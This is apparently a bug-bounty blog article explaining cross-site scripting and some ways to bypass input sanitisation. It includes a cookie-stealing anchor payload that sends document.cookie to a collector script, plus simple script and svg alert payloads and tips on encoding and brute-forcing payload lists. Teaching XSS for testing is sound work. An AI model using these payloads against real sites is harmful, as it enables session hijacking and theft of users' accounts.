BOOK THIS SPACE FOR AD
ARTICLE ADHey Cyberpunks , I hope you all are doing great in your life and if not, then you are at the right place to at least remove the queries of XSS from your life. This article is going to make you somewhere close to perfection (as we all know nobody is perfect :P). So, without wasting any time let’s take a dive into this.
Disclaimer:- I am going to keep it very simple so that you actually understand #BehindtheScene of XSS. Also, I will not cover the different types of XSS as you can find it anywhere over internet. This Article will talk about the backend process and some techniques to bypass XSS. No bookish language. Just Hackers Language.
Before we start let’s understand what actually XSS is ?
What the hack is XSS (Cross-Site-Scripting)?
XSS is a Client Side Code Injection attack. With that I mean, by embedding malicious code in a genuine web page, the attacker hopes to execute harmful scripts on the victim’s web browser.
I found this image to be helpful to understand the concept clearly. Have a look and try to understand what is actually happening?
Still have any doubt? No worries, at all let’s take a more deep dive with an example.
Example
1. Let’s say you are testing a site xyz.com and you found that, you can inject your script at any parameter/Vulnerable point.
2. Then you injected your script let’s say “<a onlcick document.location=”http://localhost/ethicalkaps/getcookies.php?cookie=’+escape(document.cookie); href=”https://ethicalkaps.com”>ClickHere</a>”. (This will basically steal the cookie from victim’s session )
3. That script went to web application and it manipulated the website code.
4. Now, when victim visits your link that you have created through href, then you will be able to fetch victim’s session cookie.
Simple Right? Yeah, indeed it is !! But what happens most of the time, the developer sanitizes the user input and because of that we are unable to inject our payload directly onto the website so we look for other ways to bypass the sanitization.
Few ways to bypass the restrictions :-
Use Encoding for your payload. (For e.g. < can be encoded to %3C, ? as %3F%0A etc.)If your payload is reflecting on website and is not executing. Then View Page Source and see where your payload is getting stuck & according to that make changes to your payload.Sometime we miss XSS by our visuals, so for that don’t forget to try BLIND XSS. (I personally use XSS Hunter for that.)You can use Intruder attack if there is no rate limit on the parameter and inject the list of payloads.I personally prefer :-
Reason being they keep updating their payload list on the regular basis.
These are some ways that you can’t forget to look out for. If you want to check more about how you can actually bypass the coding restrictions.
Visit :-
for some practical payload stuffs.
So Hackers, Now its time for you to decide whether Is it really just about finding out the “PARAMETERS” or “SEARCH” field and running these type of payloads? For e.g. “><script>alert(“Cyberpunks here”)</script> , “><svg/onload=alert(1)> etc. OR there is something more to it ?
Keep Digging and learning new stuffs. I will come back to you with another #BehindtheScene of some other vulnerability. Till then take care and Keep Hunting for good.
If you like the content then, you can support me over here :- @buymeacoffee.com/ethicalkaps
See you in the next Article. Until then Take care. Peace!